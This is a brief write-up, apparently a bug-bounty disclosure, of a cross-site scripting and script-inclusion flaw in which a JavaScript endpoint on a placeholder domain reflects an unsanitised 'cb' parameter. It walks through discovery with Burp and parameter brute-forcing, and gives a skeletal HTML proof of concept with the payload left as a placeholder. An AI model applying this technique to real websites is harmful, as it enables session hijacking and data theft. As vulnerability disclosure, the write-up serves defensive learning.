Xss using dynamically generated js file
2 min readJul 19, 2017
Severity : High
Complexity: Medium
Weakness: Disclosing JS endpoint & not sanitizing User Input
— — — — — — — — — — — — — — — — — — — — — — — — — — — —
Discovery :
- While checking Burp Proxy Request’s I came across following JavaScript file.
- I started brute-forcing for any parameter for JS endpoint and found ?cb=
- Which Take’s the user input and append it to getScript Calling Function Since the Content type is text/plain. So we Need to Find a Way to Render our Input .
https://www.site.com/mvcs/kt/tags/pclntny.js?cb=xxxxxxxxx
- We know that JS file’s doesn’t care about SOP & can be access by making cross domain request’s , Luckily there was no X-Content-Sniffing Header aswell .
Now the Task was to Find Where , https://www.site.com/mvcs/kt/tags/pclntny.js js file is being rendered in HTML/Javascript under https://www.site.com/
- I Used Burp Proxy Search Filter option to look for that endpoint .
Found that it is used in https://www.site.com/user/public/apps/tags?val=pcltny.js
<script type="text/javascript" src="/mvcs/kt/tags/pclntny.js" />.
.
.
.
.
var Doc = uri.queryKey['cb'];— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — -
Exploitation :
- Simple POC :
<html>
<body><script src="https://www.site.com/mvcs/kt/tags/pclntny.js?cb=xxxx')<PAYLOAD-HERE>;">...window.open(https://www.site.com/user/public/apps/tags?val=pcltny.js, '_blank').focus();</script>
</body>
</html>
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — -
- Able to Bypass their Cross domain Policy by injecting AJAX Request’s
Tools: https://github.com/maK-/parameth For checking Parameter’s .
Reference :
- https://www.hurricanelabs.com/blog/new-xssi-vector-untold-merits-of-nosniff
- https://www.scip.ch/en/?labs.20160414
- http://google-gruyere.appspot.com/part3#3__cross_site_script_inclusion
